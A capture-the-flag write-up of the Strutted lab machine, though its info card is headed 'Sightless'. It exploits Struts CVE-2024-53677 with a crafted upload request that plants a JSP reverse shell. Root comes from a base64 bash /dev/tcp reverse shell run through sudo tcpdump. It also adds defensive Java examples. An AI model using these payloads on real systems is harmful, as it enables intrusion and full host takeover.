Machine Info

[Image: Machine info card]

Name: Sightless
OS: Linux
Difficulty: Medium
Release Date: 2025-01-23
Completed: 2025-02-16

Reconnaissance

nmap

nmap finds 2 open ports: 22/tcp (SSH) and 80/tcp (HTTP).

┌──(kali㉿kali)-[~]
└─$ nmap -p- --min-rate 8000 -sCV 10.10.11.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 15:25 EST
Warning: 10.10.11.59 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.59
Host is up (0.072s latency).
Not shown: 64389 closed tcp ports (reset), 1144 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://strutted.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.86 seconds

Port 22 (SSH) is running OpenSSH. Based on the version detected by nmap, the host is likely running Ubuntu 22.04 Jammy.

Port 80 (HTTP) is running nginx 1.18.0, and returns a redirect to strutted.htb. Based on the HTTP redirect, this hostname can be added to /etc/hosts.

10.10.11.59    strutted.htb

Nginx - Port 80

The site hosted by Nginx on port 80:

[Image: Strutted application]

The site appears to contain a file upload that accepts image formats. A unique link will be generated for each uploaded image.

Additionally, the site indicates the environment is hosted using Docker, and provides a download link for the Docker image. Following this link downloads a ZIP file that contains the source code and configuration files for the web application.

┌──(kali㉿kali)-[~/Downloads]
└─$ unzip -l strutted.zip 
Archive:  strutted.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
      615  2025-01-07 00:59   Dockerfile
     4064  2025-01-07 00:59   README.md
     1361  2025-01-07 00:59   context.xml
        0  2025-01-07 00:59   strutted/
     3999  2025-01-07 00:59   strutted/pom.xml
     5810  2025-01-07 00:59   strutted/mvnw.cmd
     9113  2025-01-07 00:59   strutted/mvnw
        0  2025-01-07 00:59   strutted/src/
        0  2025-01-07 00:59   strutted/src/main/
        0  2025-01-07 00:59   strutted/src/main/webapp/
        0  2025-01-07 01:00   strutted/src/main/webapp/WEB-INF/
     4303  2025-01-07 01:01   strutted/src/main/webapp/WEB-INF/error.jsp
     1117  2025-01-07 00:59   strutted/src/main/webapp/WEB-INF/web.xml
     4285  2025-01-07 01:01   strutted/src/main/webapp/WEB-INF/showImage.jsp
     5647  2025-01-07 01:11   strutted/src/main/webapp/WEB-INF/upload.jsp
     6125  2025-01-07 01:01   strutted/src/main/webapp/WEB-INF/how.jsp
     6616  2025-01-07 01:01   strutted/src/main/webapp/WEB-INF/about.jsp
     7120  2025-01-07 01:01   strutted/src/main/webapp/WEB-INF/success.jsp
        0  2025-01-07 00:59   strutted/src/main/java/
        0  2025-01-07 00:59   strutted/src/main/java/org/
        0  2025-01-07 00:59   strutted/src/main/java/org/strutted/
        0  2025-01-07 01:00   strutted/src/main/java/org/strutted/htb/
     6656  2025-01-07 00:59   strutted/src/main/java/org/strutted/htb/Upload.java
     1832  2025-01-07 00:59   strutted/src/main/java/org/strutted/htb/URLMapping.java
      199  2025-01-07 00:59   strutted/src/main/java/org/strutted/htb/AboutAction.java
     1582  2025-01-07 00:59   strutted/src/main/java/org/strutted/htb/DatabaseUtil.java
      197  2025-01-07 00:59   strutted/src/main/java/org/strutted/htb/HowAction.java
     1146  2025-01-07 00:59   strutted/src/main/java/org/strutted/htb/URLUtil.java
        0  2025-01-07 00:59   strutted/src/main/resources/
     2145  2025-01-07 01:00   strutted/src/main/resources/struts.xml
        0  2025-01-07 00:59   strutted/target/
        0  2025-01-07 00:59   strutted/target/generated-sources/
        0  2025-01-07 00:59   strutted/target/generated-sources/annotations/
        0  2025-01-07 00:59   strutted/target/strutted-1.0.0/
        0  2025-01-07 00:59   strutted/target/strutted-1.0.0/META-INF/
        0  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/
      587  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/error.jsp
     1117  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/web.xml
        0  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/lib/
   794034  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/lib/javassist-3.29.0-GA.jar
 14259880  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/lib/sqlite-jdbc-3.47.1.0.jar
   632267  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/lib/commons-lang3-3.13.0.jar
   264823  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/lib/ognl-3.3.4.jar
    95505  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/lib/javax.servlet-api-4.0.1.jar
    74132  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/lib/commons-fileupload-1.5.jar
   238400  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/lib/commons-text-1.10.0.jar
   313296  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/lib/log4j-api-2.20.0.jar
  1519233  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/lib/struts2-core-6.3.0.1.jar
  1736381  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/lib/freemarker-2.3.32.jar
   483954  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/lib/commons-io-2.13.0.jar
        0  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/classes/
     2315  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/classes/struts.xml
        0  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/classes/org/
        0  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/
        0  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/htb/
      454  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/htb/AboutAction.class
     3276  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/htb/URLMapping.class
     1610  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/htb/URLUtil.class
     7344  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/htb/Upload.class
     2899  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/htb/DatabaseUtil.class
      448  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/htb/HowAction.class
     5651  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/upload.jsp
     6125  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/how.jsp
     6918  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/about.jsp
     7120  2025-01-07 00:59   strutted/target/strutted-1.0.0/WEB-INF/success.jsp
        0  2025-01-07 00:59   strutted/target/classes/
     2315  2025-01-07 00:59   strutted/target/classes/struts.xml
        0  2025-01-07 00:59   strutted/target/classes/org/
        0  2025-01-07 00:59   strutted/target/classes/org/strutted/
        0  2025-01-07 00:59   strutted/target/classes/org/strutted/htb/
      454  2025-01-07 00:59   strutted/target/classes/org/strutted/htb/AboutAction.class
     3276  2025-01-07 00:59   strutted/target/classes/org/strutted/htb/URLMapping.class
     1610  2025-01-07 00:59   strutted/target/classes/org/strutted/htb/URLUtil.class
     7344  2025-01-07 00:59   strutted/target/classes/org/strutted/htb/Upload.class
     2899  2025-01-07 00:59   strutted/target/classes/org/strutted/htb/DatabaseUtil.class
      448  2025-01-07 00:59   strutted/target/classes/org/strutted/htb/HowAction.class
        0  2025-01-07 00:59   strutted/target/maven-archiver/
       57  2025-01-07 00:59   strutted/target/maven-archiver/pom.properties
 19820601  2025-01-07 00:59   strutted/target/strutted-1.0.0.war
        0  2025-01-07 00:59   strutted/target/maven-status/
        0  2025-01-07 00:59   strutted/target/maven-status/maven-compiler-plugin/
        0  2025-01-07 00:59   strutted/target/maven-status/maven-compiler-plugin/compile/
        0  2025-01-07 00:59   strutted/target/maven-status/maven-compiler-plugin/compile/default-compile/
      199  2025-01-07 00:59   strutted/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
      589  2025-01-07 00:59   strutted/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
      222  2025-01-07 00:59   tomcat-users.xml
---------                     -------
 40371715                     86 files

There are several notable files included in strutted.zip that reveal what technologies were used to build this web application, as well as the configuration that is possibly used by the instance deployed on strutted.htb. Specifically, README.md provides a high-level overview of the application and its functionality. pom.xml lists the project’s dependencies, which include Apache Struts version 6.3.0.1. tomcat-users.xml indicates the use of Apache Tomcat, and contains the credentials admin:skqKY6360z!Y. DatabaseUtil.java and URLMapping.java include details of the database schema used by the application.

Vulnerability Analysis

Apache Struts

Currently, on the Apache Struts homepage, there is an announcement and security bulletin for CVE-2024-53677 which impacts versions prior to 6.4.0. This vulnerability is a result of flawed file upload logic in which an attacker may manipulate file upload parameters, leading to path traversal, potentially allowing for remote code execution. The Strutted web application appears to be using version 6.3.0.1 and allows for file uploads using the vulnerable FileUploadInterceptor (this can be seen in struts.xml).

A Google search for CVE-2024-53677 returns a proof of concept exploit. The proof of concept includes a reference to a blog post that analyzes this vulnerability and provides several example scenarios. Successful exploitation of this vulnerability would allow an attacker to modify properties of the Struts ValueStack. The ValueStack is used to provide access to action properties. In the context of a file upload action, this would include the filename, allowing for path traversal, resulting in potential remote code execution.

Strutted

In the Strutted application, the vulnerable upload action using FileUploadInterceptor is named “upload”. The configuration of this action is found in struts.xml. The configuration also defines org.strutted.htb.Upload as the class used to handle uploads, and which file extensions are allowed to be uploaded (jpg, jpeg, png, and gif).

<action name="upload" class="org.strutted.htb.Upload">
  <interceptor-ref name="fileUpload">
    <param name="maximumSize">2097152</param>
    <param name="allowedExtensions">jpg,jpeg,png,gif</param>
    <param name="message">
      Invalid file type! Allowed types: jpg, jpeg, png, gif.
    </param>
  </interceptor-ref>
  <interceptor-ref name="defaultStack" />
  <result name="input">WEB-INF/upload.jsp</result>
  <result name="error">WEB-INF/error.jsp</result>
  <result name="success">WEB-INF/success.jsp</result>
</action>

The Upload class, org.strutted.htb.Upload, contains several conditions that the uploaded file must meet. Specifically, this class checks the content type and magic bytes of the uploaded file. The accepted content types are image/jpeg, image/png, and image/gif. The uploaded file’s magic bytes are checked by reading the first 8 bytes of the file, then checking whether they match those of the expected file type.

// JPEG
if (header[0] == (byte)0xFF && header[1] == (byte)0xD8 && header[2] == (byte)0xFF) {
    return true;
}

// PNG
if (header[0] == (byte)0x89 && header[1] == (byte)0x50 && header[2] == (byte)0x4E && header[3] == (byte)0x47) {
    return true;
}

// GIF (GIF87a or GIF89a)
if (header[0] == (byte)0x47 && header[1] == (byte)0x49 && header[2] == (byte)0x46 &&
    header[3] == (byte)0x38 && (header[4] == (byte)0x37 || header[4] == (byte)0x39) && header[5] == (byte)0x61) {
    return true;
}

These additional checks prevent directly uploading a JSP shell. However, with a specially crafted upload request, these checks may be bypassed. Using the technique described in the CVE-2024-53677 analysis post and proof of concept exploit, a shell may be written to an arbitrary path, allowing for remote code execution.

Specifying the content type as image/jpeg should ensure the first file upload condition is met. Including the magic bytes that are checked for JPEG files (FF D8 FF) at the start of the shell payload should meet the second condition. The image upload path is constructed using the following: "uploads/" + timeStamp + "/" + uploadFileName. Using the filename ../../b.jsp should place the shell at the web root, making it accessible at http://strutted.htb/b.jsp.

POST /upload.action HTTP/1.1
Host: strutted.htb
Content-Type: multipart/form-data; boundary=---------------------------11563738178138441912293840439

-----------------------------11563738178138441912293840439
Content-Disposition: form-data; name="Upload"; filename="strutted.jpg"
Content-Type: image/jpeg

ÿØÿ
</usr/share/webshells/jsp/jsp-reverse.jsp>
-----------------------------11563738178138441912293840439
Content-Disposition: form-data; name="top.UploadFileName"

../../b.jsp
-----------------------------11563738178138441912293840439--
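
The same path construction with the client-supplied name treated as untrusted, as an added example (not code from Upload.java or from the Struts project). The class name, the web root /srv/app/webroot and the timestamp value are assumptions; the hardened method keeps only the last path element, re-checks the extension on that value, and confirms the target stays inside the upload directory.

```java
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;
import java.util.Set;

public class SafeUploadPath {
    // Same extensions the page's struts.xml allows.
    private static final Set<String> ALLOWED_EXT = Set.of("jpg", "jpeg", "png", "gif");

    // The construction quoted on the page: "uploads/" + timeStamp + "/" + uploadFileName
    static Path naiveTarget(Path webRoot, String timeStamp, String uploadFileName) {
        return webRoot.resolve("uploads/" + timeStamp + "/" + uploadFileName).normalize();
    }

    // Hardened form: the name is untrusted data, never a path.
    static Path safeTarget(Path webRoot, String timeStamp, String uploadFileName) {
        if (uploadFileName == null) {
            throw new IllegalArgumentException("missing file name");
        }
        Path uploadDir = webRoot.resolve("uploads").resolve(timeStamp).normalize();
        Path last;
        try {
            // Normalise Windows separators, then keep only the final element.
            last = Paths.get(uploadFileName.replace('\\', '/')).getFileName();
        } catch (InvalidPathException e) {
            throw new IllegalArgumentException("invalid file name", e);
        }
        String name = (last == null) ? "" : last.toString();
        int dot = name.lastIndexOf('.');
        String ext = (dot < 0) ? "" : name.substring(dot + 1).toLowerCase(Locale.ROOT);
        // Check the extension of the name that will be written, not of the name
        // that arrived with the file part.
        if (dot <= 0 || !ALLOWED_EXT.contains(ext)) {
            throw new IllegalArgumentException("extension not allowed: " + name);
        }
        Path target = uploadDir.resolve(name).normalize();
        // Containment check: the final path must still be below uploadDir.
        if (!target.startsWith(uploadDir) || target.equals(uploadDir)) {
            throw new IllegalArgumentException("path escapes upload directory");
        }
        return target;
    }

    public static void main(String[] args) {
        Path webRoot = Paths.get("/srv/app/webroot"); // assumed web root
        String ts = "20250209_152500";                // constructed timestamp
        String[] names = {"strutted.jpg", "../../b.jsp", "../../b.jpg", ".."};
        for (String n : names) {
            System.out.println("name   : " + n);
            System.out.println("  naive: " + naiveTarget(webRoot, ts, n));
            try {
                System.out.println("  safe : " + safeTarget(webRoot, ts, n));
            } catch (IllegalArgumentException e) {
                System.out.println("  safe : rejected (" + e.getMessage() + ")");
            }
        }
    }
}
```

Run with `java SafeUploadPath.java` (Java 11 or later). This is application-level defence in depth; the bulletin cited above places the affected range at versions prior to 6.4.0, so moving off those versions remains the primary fix.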

Exploitation

Strutted

After capturing a legitimate file upload request using the Burp Suite Proxy, the request can be modified as described in the previous section and sent using the Repeater. The response from the server indicates the shell was successfully uploaded.

[Image: Burp upload]
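
From the defender's side, the modified request differs from a normal upload in ways a request filter or log review can test for. The following added example (not part of the original write-up or of Struts) checks multipart part headers for those traits; the class name and both sample bodies are constructed, and the rules are heuristics assumed for illustration.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class UploadRequestAudit {
    // Groups: 1 = field name, 2 = filename (file parts only),
    // 3 = first line of the value (plain fields only).
    private static final Pattern PART = Pattern.compile(
        "(?im)^Content-Disposition:\\s*form-data;\\s*name=\"([^\"]*)\""
        + "(?:;\\s*filename=\"([^\"]*)\")?[ \\t]*\\r?\\n(?:\\r?\\n([^\\r\\n]*))?");
    // Characters used for property navigation; a flat form field needs none.
    private static final Pattern NAVIGATION = Pattern.compile("[.\\[\\]()#@]");
    // Struts fills <field>FileName and <field>ContentType from the file part itself,
    // so a plain field carrying one of those names is the client overriding them.
    private static final Pattern DERIVED = Pattern.compile("(?i)(FileName|ContentType)$");

    static boolean hasPathSyntax(String s) {
        return s != null && (s.contains("..") || s.contains("/") || s.contains("\\"));
    }

    static List<String> findings(String multipartBody) {
        List<String> out = new ArrayList<>();
        Matcher m = PART.matcher(multipartBody);
        while (m.find()) {
            String name = m.group(1), filename = m.group(2), value = m.group(3);
            boolean derived = filename == null && DERIVED.matcher(name).find();
            if (NAVIGATION.matcher(name).find()) {
                out.add("field name uses property navigation: " + name);
            }
            if (derived) {
                out.add("client sets interceptor-derived property: " + name);
            }
            if (hasPathSyntax(filename)) {
                out.add("path syntax in filename of part: " + name);
            }
            if (derived && hasPathSyntax(value)) {
                out.add("path syntax in value of " + name + ": " + value);
            }
        }
        return out;
    }

    public static void main(String[] args) {
        String b = "--x"; // constructed boundary
        // Constructed sample: an ordinary upload with a single file part.
        String legit = String.join("\n",
            b, "Content-Disposition: form-data; name=\"upload\"; filename=\"cat.png\"",
            "Content-Type: image/png", "", "(file bytes omitted)", b + "--");
        // Constructed sample shaped like the modified request shown on this page.
        String tampered = String.join("\n",
            b, "Content-Disposition: form-data; name=\"Upload\"; filename=\"strutted.jpg\"",
            "Content-Type: image/jpeg", "", "(file bytes omitted)",
            b, "Content-Disposition: form-data; name=\"top.UploadFileName\"",
            "", "../../b.jsp", b + "--");
        System.out.println("legit    -> " + findings(legit));
        System.out.println("tampered -> " + findings(tampered));
    }
}
```

The same three rules can run in a servlet filter ahead of the upload action or over captured request bodies during incident review.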

The shell is accessible at the expected path: http://strutted.htb/b.jsp. It accepts an IP address and port to connect to, and starts a new bash process.

[Image: JSP web shell]

With nc listening for new connections, the IP address and port can be sent to the server. A connection is received, and the shell appears to be functional. Using id to get the current user and group, it appears the shell is running as tomcat.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.190] from (UNKNOWN) [10.10.11.59] 44498
id
uid=998(tomcat) gid=998(tomcat) groups=998(tomcat)

Privilege Escalation

james

After upgrading the reverse shell, listing the current directory (/var/lib/tomcat9) reveals a config directory (/etc/tomcat9).

tomcat@strutted:~$ pwd
/var/lib/tomcat9
tomcat@strutted:~$ ls -la
total 20
drwxr-xr-x  5 root   root   4096 Feb 15 05:27 .
drwxr-xr-x 41 root   root   4096 Jan 15 14:30 ..
lrwxrwxrwx  1 root   root     12 Jul 20  2022 conf -> /etc/tomcat9
drwxr-xr-x  2 tomcat tomcat 4096 Jan 15 14:30 lib
lrwxrwxrwx  1 root   root     17 Jul 20  2022 logs -> ../../log/tomcat9
drwxr-xr-x  2 root   root   4096 Feb 15 05:27 policy
drwxrwxr-x  3 tomcat tomcat 4096 Jan 15 14:30 webapps
lrwxrwxrwx  1 root   root     19 Jul 20  2022 work -> ../../cache/tomcat9
tomcat@strutted:~$ ls -la /etc/tomcat9
total 220
drwxr-xr-x   4 root root     4096 Jan 15 14:30 .
drwxr-xr-x 107 root root     4096 Jan 21 13:54 ..
drwxrwxr-x   3 root tomcat   4096 Jan 15 14:30 Catalina
-rw-r-----   1 root tomcat   7276 Jan 15  2022 catalina.properties
-rw-r-----   1 root tomcat   1400 Jan 15  2022 context.xml
-rw-r-----   1 root tomcat   1149 Jan 15  2022 jaspic-providers.xml
-rw-r-----   1 root tomcat   2799 Jul 19  2022 logging.properties
drwxr-xr-x   2 root tomcat   4096 Jan 15 14:30 policy.d
-rw-r-----   1 root tomcat   7606 Jan  7 10:40 server.xml
-rw-r-----   1 root tomcat   2902 Jan 11 13:49 tomcat-users.xml
-rw-r-----   1 root tomcat 172359 Jan 15  2022 web.xml

The most notable file in the config directory is tomcat-users.xml. The majority of this file is commented out, including a password for the admin user (admin:IT14d6SSP81k). This password is different from the one found in the sample tomcat-users.xml file.

...
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
...
<!--
  <user username="admin" password="<must-be-changed>" roles="manager-gui"/>
  <user username="robot" password="<must-be-changed>" roles="manager-script"/>
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="admin" password="IT14d6SSP81k" roles="manager-gui,admin-gui"/>
--->
...
</tomcat-users>

Listing the contents of /etc/passwd, there does not appear to be a user with the name admin. However, there are 3 non-standard users. tomcat is the current user, which is configured with a home directory of /var/lib/tomcat9, and no login shell. james has the name Network Administrator, a home directory of /home/james, and a login shell of /bin/bash. _laurel is configured with a home directory of /var/log/laurel and no login shell.

tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat9:/usr/sbin/nologin
james:x:1000:1000:Network Administrator:/home/james:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false

james appears to be the only user with a home directory in /home. This directory is not readable by the tomcat user.

tomcat@strutted:~$ ls -la /home
total 12
drwxr-xr-x  3 root  root  4096 Jan 15 14:30 .
drwxr-xr-x 18 root  root  4096 Jan 15 14:30 ..
drwxr-x---  3 james james 4096 Jan 15 15:36 james

/var/log/laurel appears to contain several log files. These are only readable and writable by _laurel.

tomcat@strutted:~$ ls -la /var/log/laurel
total 71624
drwxr-xr-x   2 _laurel _laurel    4096 Feb 16 17:24 .
drwxrwxr-x  12 root    syslog     4096 Feb 16 00:00 ..
-rw-------+  1 _laurel _laurel 3271903 Feb 16 19:57 audit.log
-rw-------+  1 _laurel _laurel 5000697 Feb 16 17:24 audit.log.1
-rw-------+  1 _laurel _laurel 5000778 Feb 15 07:01 audit.log.10
-rw-------+  1 _laurel _laurel 5000235 Jan 21 13:54 audit.log.11
-rw-------+  1 _laurel _laurel 5000383 Jan 21 13:54 audit.log.12
-rw-------+  1 _laurel _laurel 5000302 Jan 21 13:54 audit.log.13
-rw-------+  1 _laurel _laurel 5000603 Jan 21 13:54 audit.log.14
-rw-------+  1 _laurel _laurel 5000690 Feb 16 13:28 audit.log.2
-rw-------+  1 _laurel _laurel 5000215 Feb 16 09:35 audit.log.3
-rw-------+  1 _laurel _laurel 5000540 Feb 16 05:41 audit.log.4
-rw-------+  1 _laurel _laurel 5000614 Feb 16 01:45 audit.log.5
-rw-------+  1 _laurel _laurel 5000241 Feb 15 22:15 audit.log.6
-rw-------+  1 _laurel _laurel 5000903 Feb 15 18:22 audit.log.7
-rw-------+  1 _laurel _laurel 5000569 Feb 15 14:50 audit.log.8
-rw-------+  1 _laurel _laurel 5000596 Feb 15 10:55 audit.log.9

Attempting to use the password from tomcat-users.xml to su to james is not successful.

tomcat@strutted:~$ su - james
Password: 
su: Authentication failure

As previously identified, the server is running OpenSSH. Attempting to authenticate as james:IT14d6SSP81k via SSH is successful. Running id, james is listed as a member of the sudo group.

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
...
[email protected]'s password: 
...

james@strutted:~$ id
uid=1000(james) gid=1000(james) groups=1000(james),27(sudo)

Listing the home directory of james reveals user.txt. This file contains the user flag.

james@strutted:~$ ls -la
total 28
drwxr-x--- 3 james james 4096 Jan 15 15:36 .
drwxr-xr-x 3 root  root  4096 Jan 15 14:30 ..
lrwxrwxrwx 1 root  root     9 Jan 11 13:50 .bash_history -> /dev/null
-rw-r--r-- 1 james james  220 Jan 11 13:07 .bash_logout
-rw-r--r-- 1 james james 3771 Jan 11 13:07 .bashrc
drwx------ 2 james james 4096 Jan 15 15:24 .cache
-rw-r--r-- 1 james james  807 Jan 11 13:07 .profile
-rw-r----- 1 root  james   33 Feb 15 05:32 user.txt
james@strutted:~$ 
james@strutted:~$ cat user.txt
837290**************************

root

As previously identified, james is a member of the sudo group. sudo -l is used to identify what commands james may run with elevated privileges.

james@strutted:~$ sudo -l
Matching Defaults entries for james on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User james may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/sbin/tcpdump

james is only permitted to run tcpdump with elevated privileges. A quick search for tcpdump on GTFOBins reveals that when tcpdump is permitted to run with sudo, it may be used to maintain elevated privileges. Using this technique, a base64 encoded reverse shell can be sent back to a nc listener.

james@strutted:~$ COMMAND='echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xOTAvOTAwMiAwPiYx | base64 -d | bash'
james@strutted:~$ TF=$(mktemp)
james@strutted:~$ echo "$COMMAND" > $TF
james@strutted:~$ chmod +x $TF
james@strutted:~$ sudo tcpdump -ln -i lo -w /dev/null -W1 -G 1 -z $TF -Z root
tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes
Maximum file limit reached: 1
1 packet captured
4 packets received by filter
0 packets dropped by kernel

The reverse shell as root is successful.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.10.14.190] from (UNKNOWN) [10.10.11.59] 54292
bash: cannot set terminal process group (2943): Inappropriate ioctl for device
bash: no job control in this shell
root@strutted:/home/james# id
id
uid=0(root) gid=0(root) groups=0(root)

Listing the directory /root reveals root.txt. This file contains the root flag.

root@strutted:~# ls -la
ls -la
total 32
drwx------  5 root root 4096 Feb 15 05:32 .
drwxr-xr-x 18 root root 4096 Jan 15 14:30 ..
lrwxrwxrwx  1 root root    9 Apr 27  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Oct 15  2021 .bashrc
drwx------  2 root root 4096 Jan 16 10:55 .cache
drwxr-xr-x  3 root root 4096 Jan 16 10:55 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r-----  1 root root   33 Feb 15 05:32 root.txt
drwx------  2 root root 4096 Jan 15 14:30 .ssh
root@strutted:~#    

root@strutted:~# cat root.txt
cat root.txt
26d907**************************